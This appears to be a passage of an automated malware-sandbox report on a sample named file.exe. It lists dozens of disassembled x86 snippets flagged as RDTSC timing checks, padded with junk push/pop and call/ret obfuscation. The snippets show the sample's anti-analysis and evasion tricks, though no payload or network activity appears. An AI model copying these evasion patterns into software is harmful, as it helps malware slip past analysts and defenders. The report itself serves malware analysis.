              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B763 second address: A4B7E7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FDE8C51D4D6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 44AD8A55h 0x00000013 mov ch, al 0x00000015 mov dx, B259h 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FDE8C51D4D8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 push ebx 0x00000036 mov esi, 60F63800h 0x0000003b pop edx 0x0000003c mov dword ptr [ebp+122D29FFh], esi 0x00000042 push 00000000h 0x00000044 movzx edi, si 0x00000047 push 00000003h 0x00000049 call 00007FDE8C51D4DEh 0x0000004e mov si, 0CE2h 0x00000052 pop edx 0x00000053 or dword ptr [ebp+122D1CE0h], edx 0x00000059 push 85473414h 0x0000005e push eax 0x0000005f push edx 0x00000060 push edx 0x00000061 jmp 00007FDE8C51D4DEh 0x00000066 pop edx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B7E7 second address: A4B7EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B8C3 second address: A4B8C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B8C9 second address: A4B927 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDE8CE8B4CAh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 293C2647h 0x00000012 mov dx, ax 0x00000015 push 00000003h 0x00000017 mov ecx, dword ptr [ebp+122D2C53h] 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FDE8CE8B4C8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 movzx ecx, di 0x0000003c push 00000003h 0x0000003e mov dx, A3DAh 0x00000042 call 00007FDE8CE8B4C9h 0x00000047 push eax 0x00000048 push edx 0x00000049 js 00007FDE8CE8B4CCh 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B927 second address: A4B92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B92B second address: A4B949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDE8CE8B4CBh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B949 second address: A4B959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4B959 second address: A4B9A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007FDE8CE8B4CDh 0x00000012 pop eax 0x00000013 lea ebx, dword ptr [ebp+12450591h] 0x00000019 mov dword ptr [ebp+122D2A94h], edx 0x0000001f xchg eax, ebx 0x00000020 jmp 00007FDE8CE8B4D4h 0x00000025 push eax 0x00000026 pushad 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BA32 second address: A4BA98 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b add dword ptr [esp], 0C01D331h 0x00000012 adc edi, 4D17B527h 0x00000018 push 00000003h 0x0000001a mov si, ax 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FDE8C51D4D8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jmp 00007FDE8C51D4DAh 0x0000003e push 00000003h 0x00000040 push edx 0x00000041 add di, 19D3h 0x00000046 pop ecx 0x00000047 mov dword ptr [ebp+122D1C44h], ecx 0x0000004d push 495446F9h 0x00000052 jo 00007FDE8C51D4EBh 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BA98 second address: A4BAC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CDh 0x00000009 popad 0x0000000a add dword ptr [esp], 76ABB907h 0x00000011 lea ebx, dword ptr [ebp+1245059Ch] 0x00000017 mov edi, dword ptr [ebp+122D2DDFh] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jng 00007FDE8CE8B4C8h 0x00000026 push edx 0x00000027 pop edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BAC8 second address: A4BACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4BACE second address: A4BAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C733 second address: A5C738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A68F7F second address: A68F85 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A690FE second address: A69103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69292 second address: A692C5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE8CE8B4D0h 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FDE8CE8B4CFh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A692C5 second address: A692DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDE8C51D4E5h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6946B second address: A69471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69471 second address: A69477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69A14 second address: A69A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8CE8B4D2h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69A34 second address: A69A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69BEA second address: A69BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69BF2 second address: A69C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FDE8C51D4E6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69E7B second address: A69E8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDE8CE8B4C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69E8A second address: A69E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69E91 second address: A69E96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69E96 second address: A69EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E4h 0x00000009 js 00007FDE8C51D4D6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A69EB9 second address: A69EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A019 second address: A6A022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A022 second address: A6A026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38AC4 second address: A38AD0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jno 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38AD0 second address: A38AEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDE8CE8B4D8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A960 second address: A6A968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6A968 second address: A6A977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jo 00007FDE8CE8B4CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AC03 second address: A6AC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AC09 second address: A6AC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6AC15 second address: A6AC21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FDE8C51D4D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71D0E second address: A71D18 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75069 second address: A7508C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007FDE8C51D4D6h 0x0000000c jmp 00007FDE8C51D4E6h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7508C second address: A75096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FDE8CE8B4C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A75096 second address: A750E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jg 00007FDE8C51D4D6h 0x00000010 jmp 00007FDE8C51D4E9h 0x00000015 pop ebx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push edi 0x0000001e pop edi 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A750E0 second address: A750E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A750E4 second address: A750EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A750EA second address: A750F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FDE8CE8B4C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A750F4 second address: A750F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7596B second address: A75991 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d jmp 00007FDE8CE8B4D8h 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C058 second address: A3C05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C05E second address: A3C064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C064 second address: A3C069 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7B05D second address: A7B061 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BE13 second address: A7BE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C47E second address: A7C488 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C637 second address: A7C63B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7C63B second address: A7C641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7CD67 second address: A7CD6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E00D second address: A7E02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E02C second address: A7E030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7F34D second address: A7F362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CCh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FE1C second address: A7FE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDE8C51D4EDh 0x0000000b jmp 00007FDE8C51D4E7h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FDE8C51D4D8h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 jmp 00007FDE8C51D4E1h 0x00000035 push 00000000h 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80836 second address: A80856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FDE8CE8B4D4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A80856 second address: A8085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8085B second address: A80866 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FBEA second address: A7FBF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FBF0 second address: A7FBFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7FBFB second address: A7FC07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85173 second address: A85179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85C75 second address: A85C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE8C51D4DBh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A88295 second address: A88301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FDE8CE8B4C8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jmp 00007FDE8CE8B4CCh 0x00000027 sbb bx, 0ED0h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D2A94h], eax 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+1247340Eh] 0x0000003c xor edi, 773260E7h 0x00000042 xchg eax, esi 0x00000043 jmp 00007FDE8CE8B4CFh 0x00000048 push eax 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FDE8CE8B4CAh 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86359 second address: A8635D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8635D second address: A8637C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8CE8B4CCh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jnc 00007FDE8CE8B4C6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8A567 second address: A8A56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8637C second address: A86381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B286 second address: A8B29F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8C51D4DFh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86381 second address: A86387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8B29F second address: A8B346 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movsx edi, ax 0x0000000c mov dword ptr [ebp+122D2802h], edx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FDE8C51D4D8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e call 00007FDE8C51D4E9h 0x00000033 sub dword ptr [ebp+122D1DFDh], ecx 0x00000039 pop ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FDE8C51D4D8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 mov ebx, 4E015CD1h 0x0000005b push eax 0x0000005c pushad 0x0000005d pushad 0x0000005e jns 00007FDE8C51D4D6h 0x00000064 jl 00007FDE8C51D4D6h 0x0000006a popad 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FDE8C51D4E8h 0x00000072 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D278 second address: A8D299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4CBh 0x00000009 jnp 00007FDE8CE8B4D2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A521 second address: A3A525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3A525 second address: A3A52F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8D86D second address: A8D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDE8C51D4D6h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FDE8C51D4D8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FDE8C51D4D8h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 push 00000000h 0x00000047 jnl 00007FDE8C51D4DCh 0x0000004d pushad 0x0000004e jmp 00007FDE8C51D4DEh 0x00000053 pushad 0x00000054 sub ecx, dword ptr [ebp+122D2D07h] 0x0000005a jbe 00007FDE8C51D4D6h 0x00000060 popad 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push edx 0x00000067 pop edx 0x00000068 jno 00007FDE8C51D4D6h 0x0000006e popad 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8D4 second address: A8E8D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8E8D8 second address: A8E8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
